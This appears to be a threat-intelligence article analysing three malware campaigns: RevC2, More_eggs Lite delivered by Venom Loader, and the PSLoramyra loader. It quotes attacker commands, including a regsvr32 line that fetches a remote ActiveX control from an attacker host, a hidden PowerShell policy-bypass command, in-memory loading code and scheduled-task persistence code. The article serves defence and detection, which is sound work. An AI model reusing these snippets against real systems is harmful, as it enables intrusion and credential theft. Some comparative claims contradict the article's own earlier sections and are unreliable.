Fileless Malware
MaaS
Explore detailed analysis of advanced fileless malware RevC2, More_eggs Lite, an...
Advanced malware campaigns continue to adapt and employ sophisticated techniques to infiltrate, persist, and exploit targeted systems. This technical [Threatfeed](https://www.secureblink.com/cyber-security-news) presents an exhaustive analysis of three notable malware campaigns: **RevC2**, **More_eggs Lite**, and **PSLoramyra**.
Each of these campaigns exemplifies distinct methodologies for evading detection, establishing persistence, and executing malicious payloads. By dissecting their infection chains, execution mechanisms, communication protocols, and persistence strategies, this analysis aims to provide a comprehensive understanding of their operational nuances and offer actionable insights for detection and mitigation.
---
## **Overview of Malware Campaigns**
### **Campaign 1: API Documentation Lure Leading to RevC2**
**Duration:** August to September
**Overview:** This campaign employs an API documentation lure delivered via obfuscated LNK files (VenomLNK) to execute a malicious payload known as **RevC2**. RevC2 is a backdoor with capabilities to steal sensitive data and maintain persistent access.
### **Campaign 2: Cryptocurrency Transaction Lure Leading to Venom Loader and More_eggs Lite**
**Duration:** September to October
**Overview:** Leveraging the allure of cryptocurrency transactions, this campaign delivers the **Venom Loader**, which subsequently loads **More_eggs Lite**, a JavaScript-based backdoor providing remote code execution (RCE) capabilities.
### **Campaign 3: PSLoramyra Fileless Malware Loader**
**Overview:** **PSLoramyra** is a sophisticated fileless malware loader that utilizes PowerShell, VBS, and BAT scripts to inject malicious payloads directly into memory, thereby evading traditional detection mechanisms. It establishes persistent access through Windows Task Scheduler and employs advanced obfuscation and process injection techniques.
---
## **Detailed Technical Analysis**
### **3.1. Campaign 1: RevC2**
#### **3.1.1. Attack Chain Overview**
The attack chain for Campaign 1 is a multi-stage process designed to deliver and execute the RevC2 backdoor seamlessly:
1. **Distribution Method:** The initial vector is an obfuscated LNK file named **VenomLNK**.
2. **Payload Delivery:** VenomLNK contains an obfuscated BAT script that downloads an API documentation PNG image from a specified URL.
3. **Execution Flow:** The BAT script registers an ActiveX control via `regsvr32` to initiate the RevC2 payload.
#### **3.1.2. First Stage: VenomLNK**
- **Obfuscation Techniques:**
- **LNK File Usage:** The use of LNK files (VenomLNK) is a strategic choice to bypass basic security measures and obfuscate the malicious intent from users and automated detection systems.
- **Obfuscated BAT Script:** Embedding an obfuscated BAT script within the LNK file serves to hide the true nature of the payload and its execution sequence.
- **API Documentation Lure:**
- **Legitimacy Exploitation:** By using an API documentation image as a lure, the attackers exploit the trust users place in legitimate documentation resources, increasing the likelihood of user interaction and execution.
- **Command Execution:**
- **ActiveX Control Registration:**
```shell
wmic process call create "regsvr32 /s /i \\gdrive.rest@8080\api\AdvancedWin.ocx"
```
- **Purpose:** This command registers the ActiveX control silently (`/s`) and passes parameters (`/i`), thereby triggering the execution of the RevC2 payload without user awareness.
#### **3.1.3. Second Stage: RevC2 Backdoor**
- **Binary Analysis:**
- **PDB Path Indication:** The presence of `Rev.pdb` in the binary path (`C:\Users\PC\Desktop\C2New\Rev\x64\Release\Rev.pdb`) may unintentionally reveal development or debugging information, potentially aiding forensic analysts in understanding the malware's structure.
- **Execution Conditions:**
- **Command-Line Argument Checks:**
- Verifies if the first argument ends with `dWin.ocx`.
- Ensures the executable path matches `regsvr32.exe`.
- **Purpose:** These conditional checks ensure that RevC2 only executes within the intended attack chain, thereby evading execution in analysis environments like sandboxes.
- **Persistence and Logging:**
- **Log File Creation:**
- **Path:** `C:\ProgramData\boot_%YYYYMMDDTHHMMSS%.log`
- **Content:** Stores internal messages with timestamps, providing operational transparency while minimizing immediate detection through anomalous behavior.
#### **3.1.4. Communication Protocol**
- **WebSockets Usage:**
- **Library:** Utilizes the C++ library `websocketpp` for establishing WebSocket connections.
- **C2 Address:** Hardcoded in the binary (e.g., `ws://208.85.17.52:8082`).
- **Data Format:** JSON objects facilitate structured and easily parsable communication between the victim's machine and the C2 server.
- **JSON Communication:**
- **Victim to C2:**
```json
{
"%output_name%": "%output_value%",
"type": "%command_ID%"
}
```
- **C2 to Victim:**
```json
{
"type": "%command_ID%",
"command": "%command_parameter%"
}
```
- **Dynamic Command IDs:** The `command_ID` sent by RevC2 may differ from the one sent by the C2 server, enhancing command obfuscation and reducing predictability.
#### **3.1.5. Command Functionality**
RevC2 supports a range of commands, each identified by a unique `command_ID`:
| **Action** | **command_ID** | **command_parameter** | **Description** |
|------------------------------------|-----------------|--------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------|
| Steals passwords | `000000` | Empty | Extracts saved passwords from Chromium browsers and sends them to the C2 server. Logs the action with a timestamped message. |
| Executes shell commands | `0001` | `%command%` | Executes arbitrary shell commands using `cmd /c`, captures the output via a pipe, and sends the results to the C2 server. |
| Takes screenshots | `0002` | `%multiplier%` | Captures screenshots with resolution scaled by the multiplier value, encodes them in base64, and sends them to the C2 server. Logs the action. |
| Proxies traffic | `0003` | `{"listenerIP": "%ip%", "listenerPort" : "%port%"}` | Sets up a SOCKS5 proxy by connecting to a target address and relaying data between the victim and the proxy server. Uses internal command IDs `0x55` and `0x70`. |
| Steals cookies | `0009` | Empty | Extracts cookies from Chromium browsers and sends them to the C2 server. Logs detailed information about the stolen cookies. |
| Executes a command as a different user | `0012` | `{"username": "%username%", "password": "%password%", "command": "%commandline%"}` | Executes specified commands under different user credentials without sending the output to the C2 server. |
#### **3.1.6. Detection and Mitigation Strategies**
- **Behavioral Analysis:**
- **Regsvr32 Monitoring:** Track executions of `regsvr32` with unusual network paths or parameters.
- **Process Validation:** Monitor processes for unexpected injections into `regsvr32.exe`.
- **Network Monitoring:**
- **WebSocket Traffic Analysis:** Scrutinize WebSocket connections to known malicious C2 servers (e.g., `ws://208.85.17.52:8082`).
- **JSON Payload Inspection:** Analyze the structure and content of JSON communications for suspicious patterns.
- **Endpoint Protection:**
- **Advanced Endpoint Detection and Response (EDR):** Deploy EDR solutions capable of identifying behaviors specific to RevC2, such as conditional execution checks and specific command patterns.
- **Credential Security:**
- **Browser Security Enhancements:** Implement browser security measures to protect stored credentials.
- **Credential Managers:** Use credential managers that encrypt stored passwords to mitigate the risk of theft.
- **Further Investigation:**
- **Distribution Mechanism Analysis:** Investigate how VenomLNK files are disseminated (e.g., phishing, malicious downloads).
- **C2 Infrastructure Mapping:** Identify and disrupt the C2 server infrastructure.
- **Payload Variability Assessment:** Analyze variations in URLs and filenames across samples to understand the malware's adaptability.
---
### **3.2. Campaign 2: More_eggs Lite via Venom Loader**
#### **3.2.1. Attack Chain Overview**
Campaign 2 employs a cryptocurrency transaction lure to deliver the **Venom Loader**, which subsequently loads **More_eggs Lite**, a JavaScript-based backdoor offering RCE capabilities. The attack chain comprises multiple stages to ensure stealth, persistence, and effective payload execution.
#### **3.2.2. First Stage: VenomLNK**
- **Obfuscation Techniques:**
- **LNK File Usage:** Similar to Campaign 1, VenomLNK files contain obfuscated BAT scripts to evade detection.
- **Multi-Script Execution:** The LNK file orchestrates the execution of VBS and BAT scripts to complicate analysis and hinder straightforward detection.
- **Cryptocurrency Transaction Lure:**
- **Exploiting User Interest:** Leveraging the popularity and financial incentive associated with cryptocurrency transactions increases the likelihood of user interaction and engagement with the malicious content.
- **Script Execution Flow:**
1. **VBS and BAT Script Generation:** The initial BAT script writes `run_bat.vbs` and `bat2.bat` to the Windows temporary directory.
2. **Script Execution:** Executes `run_bat.vbs`, which in turn runs `bat2.bat`.
3. **Payload Download:** `bat2.bat` downloads an image of a cryptocurrency transaction as a lure and displays it to the victim.
4. **Malicious Payload Download:** Concurrently, downloads `base.zip` containing `ApplicationFrameHost.exe` from a designated URL.
#### **3.2.3. Second Stage: Venom Loader**
- **Customization Per Victim:**
- **Dynamic DLL Generation:** Venom Loader DLLs are custom-built for each victim, complicating the creation of universal detection signatures and impeding automated analysis.
- **Encoding Mechanism:**
- **XOR Encoding with Environment Variables:** Uses the `%computername%` environment variable as an XOR key to encode subsequent payload stages, introducing system-specific variability that challenges detection and analysis.
- **Persistence Mechanism:**
- **Task Scheduler Integration:** Creates a scheduled task to ensure continuous execution and persistence across system reboots.
- **Execution Flow:**
1. **Sideloading Malicious DLL:**
- Unzips `base.zip` containing `ApplicationFrameHost.exe`.
- Executes `ApplicationFrameHost.exe`, which sideloads `dxgi.dll`, leading to Venom Loader execution.
2. **Payload Handling:**
- **More_eggs Lite Delivery:** Venom Loader decodes and executes the More_eggs Lite backdoor by writing split, encoded chunks to disk and reconstructing them via a PowerShell script.
#### **3.2.4. Third Stage: More_eggs Lite Backdoor**
- **Functionality:**
- **Remote Code Execution (RCE):** Enables attackers to execute arbitrary commands on the infected system.
- **HTTP POST Communication:** Continuously sends POST requests to the C2 server for command reception and output exfiltration.
- **Communication Protocol:**
- **POST Request Structure:**
- **URL:** `<c2_address>/api/infos`
- **POST Data:**
```plaintext
name=^%computername%&ret=
```
- **Command Response:**
- JSON response containing `{"command": %command_encoded%}`, which is XOR’ed with `%computername%` and executed as a `.cmd` file.
#### **3.2.5. Communication Protocol**
- **C2 Communication:**
- **HTTP Protocol:** Utilizes standard HTTP POST requests, which can blend with legitimate traffic, complicating detection.
- **Command Encoding:** Commands are XOR-encoded using `%computername%`, adding an obfuscation layer that requires decoding for analysis.
#### **3.2.6. Detection and Mitigation Strategies**
- **Script Monitoring:**
- **VBS and BAT Script Detection:** Monitor the creation and execution of `run_bat.vbs` and `bat2.bat` scripts, especially those interacting with temporary directories.
- **Registry Monitoring:**
- **Task Scheduler Auditing:** Detect unauthorized additions to the Task Scheduler, particularly tasks masquerading as legitimate services like `GoogleUpdate`.
- **Network Traffic Analysis:**
- **Anomalous HTTP POST Requests:** Identify and analyze unusual POST requests to endpoints like `/api/infos`, especially those with encoded command data.
- **Endpoint Protection:**
- **Behavioral Detection:** Deploy EDR solutions capable of identifying the behaviors associated with Venom Loader and More_eggs Lite, such as environment variable-based encoding and in-memory execution.
- **Further Investigation:**
- **Encoding Technique Analysis:** Examine the XOR encoding mechanism and its reliance on environment variables for potential detection patterns.
- **C2 Server Infrastructure:** Investigate the infrastructure behind the C2 servers to disrupt command and control capabilities.
- **Persistence Mechanism Robustness:** Assess the resilience of the Task Scheduler-based persistence against common security measures and removal techniques.
---
### **3.3. Campaign 3: PSLoramyra Fileless Malware Loader**
#### **3.3.1. Infection Chain and Execution Flow**
**PSLoramyra** is an advanced **fileless malware loader** that leverages PowerShell, VBS, and BAT scripts to inject and execute malicious payloads directly in memory, thereby evading traditional detection methods. The infection chain comprises several meticulously orchestrated stages to ensure stealth, persistence, and effective payload execution.
**Infection Chain Stages:**
1. **Initial PowerShell Script Execution:**
- Contains the main malicious payload and scripts required for further execution.
- Generates essential files: `roox.ps1`, `roox.bat`, and `roox.vbs`.
- Initiates the execution chain by running `roox.vbs`.
2. **Execution Chain:**
- **roox.vbs:** Launches `roox.bat` in a hidden window.
- **roox.bat:** Executes `roox.ps1` with stealth-enhancing PowerShell flags.
- **roox.ps1:** Deobfuscates and loads the main malicious payload directly into memory using `.NET Reflection` and injects it into a legitimate process (`RegSvcs.exe`).
3. **Payload Execution:**
- **Quasar RAT:** Loaded into memory, providing remote access capabilities to the threat actor.
4. **Establishing Persistence:**
- Utilizes Windows Task Scheduler to create a task that runs `roox.vbs` every two minutes, ensuring continuous execution.
#### **3.3.2. Detailed Script Breakdown**
##### **3.3.2.1. roox.vbs Script**
- **Functionality:** Acts as a bridge between the Task Scheduler and the subsequent scripts, ensuring the infection chain progresses seamlessly.
- **Key Components:**
- **Error Handling:**
- `On Error Resume Next`: Suppresses error messages to maintain stealth during execution failures.
- **CreateWshShellObj Function:**
- Creates a `WScript.Shell` COM object to execute commands and scripts.
- **GetFilePath Function:**
- Retrieves the absolute path to `roox.bat`.
- **GetVisibilitySetting Function:**
- Configures the execution to run in a hidden window (`0`), preventing user awareness.
- **RunFile Function:**
- Executes `roox.bat` using the hidden window settings to maintain stealth.
- **Execution Sequence:**
1. Creates the `WScript.Shell` object.
2. Retrieves the path to `roox.bat`.
3. Sets the window style to hidden.
4. Executes `roox.bat` in hidden mode.
##### **3.3.2.2. roox.bat Script**
- **Functionality:** Executes the PowerShell script `roox.ps1` with specific flags to enhance stealth and bypass security measures.
- **Key Commands:**
```bat
powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\Public\roox.ps1"
```
- **Flags Explained:**
- `-NoProfile`: Prevents the loading of user-specific PowerShell profiles.
- `-WindowStyle Hidden`: Conceals the PowerShell window during execution.
- `-ExecutionPolicy Bypass`: Overrides PowerShell's execution policies to allow unrestricted script execution.
##### **3.3.2.3. roox.ps1 Script**
- **Functionality:** Deobfuscates the main malicious payload, dynamically loads it into memory, and executes it using `.NET Reflection` and `RegSvcs.exe`.
- **Key Components:**
- **Obfuscated Payload Storage:**
- **Variables:**
- `$RoXstring_lla`: Stores part of the malicious payload as a HEX string with `%&%` delimiters.
- `$Mordexstring_ojj`: Stores the remaining payload similarly.
- **Deobfuscation Process:**
```powershell
[Byte[]] $NKbb = $Mordexstring_ojj -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $RoXstring_lla -split '%&%' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
```
- **Steps:**
1. **Splitting HEX Strings:** Divides the HEX strings into individual byte segments using `%&%` as a delimiter.
2. **Conversion to Bytes:** Converts each HEX segment into its corresponding byte value, forming byte arrays.
- **Obfuscation Cleaning:**
- **Removing `#` Symbols:**
```powershell
$cleanedString = $obfuscatedString -replace '#', ''
```
- Transforms strings like `L####o####a####d` into `Load` to restore method names.
- **Assembly Loading and Payload Execution:**
```powershell
[Reflection.Assembly]::Load($binaryPayload)
```
- **Steps:**
1. **Load .NET Assembly:** Uses `Reflection.Assembly.Load` to inject the malicious assembly into memory.
2. **Process Injection:** Targets `RegSvcs.exe` to host the malicious payload, blending it with legitimate system processes.
3. **Quasar RAT Execution:** Executes the `Quasar RAT` within the injected process, providing remote access capabilities.
#### **3.3.3. Payload Execution and Memory Injection**
- **Reflection.Assembly.Load:**
- **Purpose:** Dynamically loads the malicious .NET assembly into the memory space of a legitimate system process (`RegSvcs.exe`), avoiding disk-based traces.
- **Process Injection via RegSvcs.exe:**
- **Methodology:** Injects the Quasar RAT into `RegSvcs.exe`, a legitimate Windows process, to conceal malicious activity within normal system operations.
#### **3.3.4. Persistence Mechanism**
- **Windows Task Scheduler Integration:**
- **Task Creation Steps:**
1. **Scheduler Object Initialization:**
```powershell
New-Object -ComObject Schedule.Service
$scheduler.Connect()
```
2. **Task Definition:**
```powershell
$taskDefinition = $scheduler.NewTask(0)
$taskDefinition.Settings.Enabled = $true
```
3. **Trigger Configuration:**
```powershell
$trigger.Repetition.Interval = “PT2M”
```
- **Frequency:** Every two minutes to ensure continuous execution.
4. **Action Configuration:**
```powershell
$action.Path = “C:\Users\Public\roox.vbs”
```
5. **Task Registration:**
```powershell
$taskFolder.RegisterTaskDefinition()
```
- **Task Naming:** Registered under the name `GoogleUpdate` to mimic a legitimate service, reducing suspicion.
- **Purpose:** Ensures that `roox.vbs` is executed at regular intervals, maintaining persistent malware presence even after system reboots or manual termination attempts.
#### **3.3.5. Evasion Techniques**
**PSLoramyra** employs a suite of sophisticated evasion strategies to bypass detection:
- **Fileless Execution:**
- **Memory-Based Payloads:** Injects malicious code directly into memory without writing persistent files to disk, evading traditional signature-based detection methods.
- **Obfuscation:**
- **HEX Encoding with Delimiters:** Uses HEX strings separated by `%&%` to obfuscate the payload, complicating static analysis and signature generation.
- **Symbol Removal:** Removes `#` symbols to clean obfuscated method names, further hindering analysis efforts.
- **Stealthy Process Injection:**
- **Legitimate Process Targeting:** Injects payloads into `RegSvcs.exe`, a legitimate Windows process, masking malicious activity within normal system operations.
- **Hidden Execution:**
- **Invisible Script Execution:** Runs scripts in hidden windows, preventing user awareness and reducing the likelihood of manual detection.
- **Persistence via Legitimate Services:**
- **Task Naming Mimicry:** Registers scheduled tasks under names like `GoogleUpdate`, leveraging the trust associated with legitimate services to avoid raising alarms.
#### **3.3.6. Indicators of Compromise (IOCs)**
**Hashes:**
- `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9`
- `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e`
- `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc`
- `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb`
**Files:**
- `C:\Users\Public\roox.vbs`
- `C:\Users\Public\roox.bat`
- `C:\Users\Public\roox.ps1`
**Domains:**
- `Ronymahmoud.casacam.net`
**IP Addresses:**
- `3.145.156.44`
#### **3.3.7. Detection and Mitigation Strategies**
Given PSLoramyra's sophisticated evasion techniques, a multi-layered approach to detection and mitigation is essential:
- **Behavioral Analysis:**
- **Script Execution Monitoring:** Detect the creation and execution of `roox.vbs`, `roox.bat`, and `roox.ps1`.
- **Process Injection Detection:** Monitor for unusual injections into legitimate processes like `RegSvcs.exe`.
- **Task Scheduler Auditing:** Scrutinize scheduled tasks with suspicious names or high-frequency triggers.
- **Network Traffic Monitoring:**
- **C2 Communication Detection:** Identify and block communications with known malicious domains (`Ronymahmoud.casacam.net`) and IP addresses (`3.145.156.44`).
- **Anomalous Traffic Detection:** Use network anomaly detection to spot unusual outbound connections or data exfiltration attempts.
- **Script and File Monitoring:**
- **File System Monitoring:** Detect the creation of files in public directories such as `C:\Users\Public\`.
- **Script Content Analysis:** Utilize script scanning tools to analyze the contents of PowerShell, VBS, and BAT scripts for obfuscation patterns and suspicious commands.
- **Endpoint Protection:**
- **Advanced EDR Solutions:** Deploy EDR tools capable of detecting in-memory execution and process injection techniques.
- **Anti-Malware Updates:** Ensure antivirus and anti-malware solutions are updated with the latest threat definitions and heuristic detection capabilities.
- **User Education and Awareness:**
- **Phishing Prevention Training:** Educate users about the risks of executing unsolicited scripts and the importance of verifying the legitimacy of downloaded files.
- **Security Best Practices:** Encourage the principle of least privilege, limiting user permissions to reduce the impact of potential infections.
---
## **Cross-Campaign Insights and Comparative Analysis**
### **4.1. Common Techniques and Strategies**
Despite targeting different vectors and employing distinct payloads, the analyzed campaigns share several common methodologies:
- **Use of Obfuscated Scripts:**
- **RevC2 and PSLoramyra:** Both campaigns utilize obfuscated BAT, VBS, and PowerShell scripts to conceal malicious intent and complicate detection.
- **Process Injection:**
- **RevC2 and PSLoramyra:** Both inject payloads into legitimate system processes (`regsvr32.exe` and `RegSvcs.exe` respectively) to mask malicious activities within normal system operations.
- **C2 Communication:**
- **RevC2, More_eggs Lite, and PSLoramyra:** All campaigns establish communications with external Command and Control (C2) servers, utilizing protocols like WebSockets and HTTP POST requests to receive commands and exfiltrate data.
### **4.2. Unique Characteristics**
While sharing common techniques, each campaign exhibits unique attributes that distinguish it from the others:
- **RevC2:**
- **API Documentation Lure:** Uses legitimate-looking API documentation as a lure to increase user engagement.
- **WebSocket-Based C2:** Employs WebSockets for real-time and persistent communication with the C2 server.
- **More_eggs Lite:**
- **Cryptocurrency Transaction Lure:** Leverages the financial incentive and popularity of cryptocurrency transactions to entice users.
- **JavaScript-Based Backdoor:** Utilizes a JS backdoor for remote code execution, differentiating it from the predominantly PowerShell and BAT script-based execution in other campaigns.
- **PSLoramyra:**
- **Fileless Execution:** Executes entirely in memory without creating persistent files, enhancing stealth and evasion.
- **XOR Encoding with Environment Variables:** Uses system-specific environment variables for encoding payloads, adding an additional layer of obfuscation.
### **4.3. Security Implications**
The sophistication and diversity of these campaigns underscore the evolving nature of cyber threats:
- **Evasion and Stealth:** Advanced evasion techniques like process injection, obfuscated scripting, and fileless execution make detection challenging, necessitating more sophisticated security measures.
- **Data Theft and RCE Capabilities:** The focus on credential theft, cookie extraction, and remote code execution poses significant risks to both individual users and organizational infrastructures, enabling extensive data exfiltration and system compromise.
- **Persistence Mechanisms:** Persistent access through Task Scheduler and regular script executions ensures long-term control over compromised systems, making remediation efforts more complex.
---
## **Comprehensive Indicators of Compromise (IOCs)**
### **5.1. Hashes**
| **Hash Type** | **Value** |
|---------------|-----------------------------------------------|
| SHA-256 | `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` |
| SHA-256 | `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` |
| SHA-256 | `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` |
| SHA-256 | `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` |
### **5.2. Files**
| **File Path** | **Description** |
|----------------------------------|-------------------------------------------------|
| `C:\Users\Public\roox.vbs` | VBS script initiating the execution chain. |
| `C:\Users\Public\roox.bat` | BAT script executing the PowerShell script. |
| `C:\Users\Public\roox.ps1` | PowerShell script deobfuscating and loading payload. |
### **5.3. Domains**
| **Domain** | **Description** |
|-------------------------------|---------------------------------------------------------|
| `Ronymahmoud.casacam.net` | C2 server domain used by PSLoramyra. |
### **5.4. IP Addresses**
| **IP Address** | **Description** |
|----------------------|-------------------------------------------|
| `3.145.156.44` | IP address associated with PSLoramyra C2 server. |
---
## **Unified Detection and Mitigation Strategies**
To effectively counter the multifaceted threats posed by RevC2, More_eggs Lite, and PSLoramyra, organizations should adopt a comprehensive and unified approach encompassing multiple layers of security.
### **6.1. Behavioral Analysis**
- **Script Execution Monitoring:**
- **Detection:** Identify the creation and execution of `roox.vbs`, `roox.bat`, and `roox.ps1` scripts.
- **Tools:** Utilize EDR solutions that can track script executions and flag suspicious activities based on behavior rather than signatures.
- **Process Injection Detection:**
- **Detection:** Monitor for injections into legitimate processes like `regsvr32.exe` and `RegSvcs.exe`.
- **Tools:** Advanced EDR tools can analyze process trees and detect anomalies indicative of process injection.
- **Task Scheduler Auditing:**
- **Detection:** Scrutinize tasks with high-frequency triggers (e.g., every two minutes) or suspicious names (e.g., `GoogleUpdate`).
- **Tools:** Implement policies to alert on new or modified scheduled tasks, especially those deviating from normal patterns.
### **6.2. Network Traffic Monitoring**
- **C2 Communication Detection:**
- **Detection:** Identify and block communications with known malicious domains and IP addresses (e.g., `Ronymahmoud.casacam.net`, `3.145.156.44`).
- **Tools:** Utilize network firewalls and intrusion detection systems (IDS) to filter and analyze outbound traffic for connections to malicious C2 servers.
- **Anomalous Traffic Detection:**
- **Detection:** Spot unusual WebSocket or HTTP POST traffic patterns that deviate from normal network behavior.
- **Tools:** Implement anomaly detection systems that leverage machine learning to identify deviations indicative of malware communications.
### **6.3. Script and File Monitoring**
- **File System Monitoring:**
- **Detection:** Detect the creation of files in public directories (e.g., `C:\Users\Public\`) and monitor for the presence of known malicious scripts.
- **Tools:** Deploy file integrity monitoring solutions to track and alert on unauthorized file creations or modifications.
- **Script Content Analysis:**
- **Detection:** Analyze the content of PowerShell, VBS, and BAT scripts for obfuscation patterns, HEX encoding, and suspicious commands.
- **Tools:** Use script scanning tools and sandbox environments to perform dynamic and static analysis of scripts.
### **6.4. Endpoint Protection**
- **Advanced Endpoint Detection and Response (EDR):**
- **Capabilities:** EDR solutions should be capable of detecting in-memory execution, process injection, and anomalous script behaviors.
- **Deployment:** Ensure EDR tools are consistently updated and configured to monitor for behaviors exhibited by RevC2, More_eggs Lite, and PSLoramyra.
- **Anti-Malware Solutions:**
- **Capabilities:** Ensure antivirus and anti-malware solutions are equipped with heuristic and behavior-based detection capabilities to identify emerging threats.
- **Maintenance:** Regularly update malware definitions and perform routine scans to detect and remediate infections.
### **6.5. Persistence Mechanism Auditing**
- **Task Scheduler Security:**
- **Auditing:** Regularly audit Task Scheduler for unauthorized tasks, particularly those with high-frequency triggers or names mimicking legitimate services.
- **Policies:** Implement strict policies governing who can create or modify scheduled tasks within the organization.
- **Registry Monitoring:**
- **Detection:** Monitor registry keys associated with autorun entries (e.g., `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`) for unauthorized modifications.
- **Tools:** Utilize registry monitoring tools to detect and alert on suspicious changes.
### **6.6. User Education and Awareness**
- **Phishing Prevention Training:**
- **Education:** Train users to recognize and avoid suspicious links, attachments, and downloads that may contain malicious scripts or payloads.
- **Awareness Programs:** Implement regular awareness programs to keep users informed about evolving threat vectors and social engineering tactics.
- **Security Best Practices:**
- **Principle of Least Privilege:** Enforce least privilege access controls to minimize the potential impact of compromised accounts.
- **Credential Management:** Promote the use of strong, unique passwords and implement multi-factor authentication (MFA) to protect user accounts.
---
## **Recommendations for Enhanced Security Posture**
To fortify defenses against sophisticated malware campaigns like RevC2, More_eggs Lite, and PSLoramyra, organizations should adopt a holistic and proactive security strategy encompassing technical defenses, policy enforcement, and continuous monitoring.
### **7.1. Advanced Threat Detection Solutions**
- **Deployment of Machine Learning-Based Systems:**
- **Capabilities:** Utilize machine learning algorithms to identify and respond to anomalous behaviors indicative of malware activities.
- **Benefits:** Enhances the ability to detect novel threats that evade signature-based detection methods.
- **Integration with Threat Intelligence:**
- **Action:** Incorporate threat intelligence feeds to stay updated on emerging threats, malicious IPs, and domains.
- **Benefits:** Facilitates timely detection and blocking of known malicious entities involved in malware campaigns.
### **7.2. Strengthening Script Execution Policies**
- **PowerShell Execution Policies:**
- **Enforcement:** Restrict PowerShell execution to signed scripts only, preventing the execution of unauthorized or malicious scripts.
- **Configuration:** Implement constrained language modes to limit the capabilities of PowerShell scripts, reducing the risk of abuse.
- **Script Whitelisting:**
- **Action:** Employ script whitelisting to allow only approved scripts to execute within the environment.
- **Benefits:** Minimizes the risk of unauthorized script execution and facilitates the identification of rogue scripts.
### **7.3. Regular System Audits and Hardening**
- **System File and Registry Audits:**
- **Action:** Conduct periodic audits of system files, registry entries, and scheduled tasks to identify and remediate anomalies.
- **Tools:** Utilize automated auditing tools to streamline the process and ensure comprehensive coverage.
- **Security Hardening Measures:**
- **Actions:**
- Disable unnecessary services and ports to reduce attack surfaces.
- Implement strict access controls and permissions to limit user capabilities.
- Regularly apply security patches and updates to address vulnerabilities exploited by malware.
### **7.4. Network Segmentation and Monitoring**
- **Network Segmentation:**
- **Action:** Divide the network into distinct segments to contain potential breaches and limit lateral movement.
- **Benefits:** Enhances overall network security by isolating critical systems and sensitive data.
- **Intrusion Detection and Prevention Systems (IDS/IPS):**
- **Deployment:** Implement IDS/IPS solutions to monitor and block malicious network traffic in real-time.
- **Configuration:** Fine-tune IDS/IPS rules to detect patterns associated with malware communications and command executions.
### **7.5. Threat Intelligence Integration**
- **Centralized Threat Intelligence Platforms:**
- **Action:** Integrate threat intelligence platforms to aggregate and analyze data from multiple sources.
- **Benefits:** Provides a comprehensive view of the threat landscape, enabling informed decision-making and proactive defenses.
- **Collaborative Intelligence Sharing:**
- **Action:** Participate in information-sharing communities and platforms to exchange threat intelligence with peers and industry groups.
- **Benefits:** Enhances collective awareness and resilience against emerging threats.
---
## **Potential Areas for Further Investigation**
To comprehensively understand and mitigate the threats posed by RevC2, More_eggs Lite, and PSLoramyra, further investigation is essential in the following areas:
### **8.1. Distribution Mechanisms**
- **Initial Infection Vectors:**
- **Action:** Investigate how these malware campaigns disseminate their initial LNK files (e.g., phishing emails, malicious downloads, exploit kits).
- **Purpose:** Understanding distribution methods is crucial for implementing targeted prevention measures and disrupting the malware's spread.
### **8.2. C2 Infrastructure Analysis**
- **Mapping C2 Servers:**
- **Action:** Analyze and map out the Command and Control infrastructure utilized by these malware families.
- **Tools:** Employ network forensics and threat intelligence tools to identify and locate C2 servers.
- **Purpose:** Disrupting C2 communication can hinder malware functionality and limit data exfiltration.
### **8.3. Payload Variants and Evolution**
- **Monitoring for New Variants:**
- **Action:** Continuously monitor for new variants of RevC2, More_eggs Lite, and PSLoramyra that may introduce additional functionalities or evasion techniques.
- **Tools:** Utilize threat intelligence platforms and malware analysis tools to detect and analyze new variants.
- **Purpose:** Staying abreast of malware evolution ensures that defenses remain effective against emerging threat vectors.
### **8.4. Threat Actor Profiling**
- **Identifying Threat Actors:**
- **Action:** Conduct threat intelligence gathering to attribute these malware campaigns to specific threat actors or groups.
- **Techniques:** Analyze TTPs (Tactics, Techniques, and Procedures), infrastructure, and operational patterns to profile the threat actors.
- **Purpose:** Understanding the motivations and capabilities of threat actors aids in anticipating future tactics and strengthening defenses accordingly.
---
## **Conclusion**
The comprehensive analysis of the RevC2, More_eggs Lite, and PSLoramyra malware campaigns reveals a convergence of sophisticated techniques aimed at evading detection, establishing persistent access, and executing malicious payloads effectively. These campaigns employ a blend of obfuscated scripting, process injection, fileless execution, and strategic C2 communications to maintain stealth and operational resilience.
**RevC2** leverages API documentation lures and WebSocket-based C2 communication to execute a versatile backdoor capable of credential theft and remote code execution. **More_eggs Lite**, delivered via Venom Loader, utilizes cryptocurrency transaction lures and JavaScript-based backdoors to offer robust RCE capabilities. **PSLoramyra** stands out with its entirely fileless execution model, advanced obfuscation techniques, and persistent Task Scheduler integration, making it particularly challenging to detect and mitigate.
To effectively counter these threats, organizations must adopt a layered and proactive security posture that encompasses advanced detection solutions, rigorous monitoring, user education, and continuous threat intelligence integration. By understanding the intricacies of these malware campaigns and implementing comprehensive defense strategies, organizations can enhance their resilience against sophisticated cyber threats.
---
## **Summary of Indicators of Compromise (IOCs)**
### **5.1. Hashes**
| **Hash Type** | **Value** |
|---------------|-----------------------------------------------|
| SHA-256 | `ac05a1ec83c7c36f77dec929781dd2dae7151e9ce00f0535f67fcdb92c4f81d9` |
| SHA-256 | `9018a2f6018b6948fc134490c3fb93c945f10d89652db7d8491a98790d001c1e` |
| SHA-256 | `d50cfca93637af25dc6720ebf40d54eec874004776b6bc385d544561748c2ffc` |
| SHA-256 | `Ef894d940115b4382997954bf79c1c8272b24ee479efc93d1b0b649133a457cb` |
### **5.2. Files**
| **File Path** | **Description** |
|----------------------------------|-------------------------------------------------|
| `C:\Users\Public\roox.vbs` | VBS script initiating the execution chain. |
| `C:\Users\Public\roox.bat` | BAT script executing the PowerShell script. |
